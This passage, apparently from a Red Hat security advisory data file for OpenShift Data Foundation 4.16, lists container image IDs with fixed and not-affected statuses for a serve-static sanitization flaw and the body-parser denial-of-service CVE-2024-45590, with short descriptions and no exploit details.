"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", 